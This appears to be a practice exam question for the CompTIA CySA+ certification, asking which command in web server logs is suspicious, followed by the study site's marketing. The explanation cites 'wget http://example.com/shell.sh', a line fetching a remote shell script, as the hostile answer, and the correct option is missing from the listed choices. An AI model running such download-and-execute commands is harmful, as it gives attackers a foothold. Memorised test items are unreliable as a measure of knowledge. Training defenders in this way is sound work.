CompTIA CySA+ CS0-003 Practice Question
Which of the following would typically be considered a suspicious command when found in the logs of an enterprise web server?
ls -l /var/www/html
tail -f /var/log/apache2/access.log
service apache2 restart
Which of the following would typically be considered a suspicious command when found in the logs of an enterprise web server?
ls -l /var/www/html
tail -f /var/log/apache2/access.log
service apache2 restart
The correct answer is 'wget http://example.com/shell.sh'. The use of the wget
command to download a script from an external source is often associated with the initial stages of an exploit or the download of a malicious payload. The web server logs showing this command being executed may suggest that the server is being used to retrieve and possibly execute a shell script from an untrusted source, potentially part of a command and control activity or initial foothold by an attacker. 'ls -l /var/www/html' is a common command to list files in the web server's root directory, 'tail -f /var/log/apache2/access.log' is used for real-time log monitoring, and 'service apache2 restart' is a legitimate service management command.
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
All Information Technology Package plans include the following perks and exams.
Our pricing is simple. Full access to all certifications and exams in each package, for one price.
As many practice tests for as many topics as you want.
Use study mode non-stop, no limits.
Access to our AI assistant, Bash, trained to help you pass your exam.
Track your scores over time in study mode and report cards.
See how you improve over time, and where you need to focus.
Access our store with even bigger discounts than before.
Unlimited access to all performance questions and be prepared for the real thing.
All Information Technology Package plans include unlimited access to the following study materials.
Create an account or sign in to access our study materials.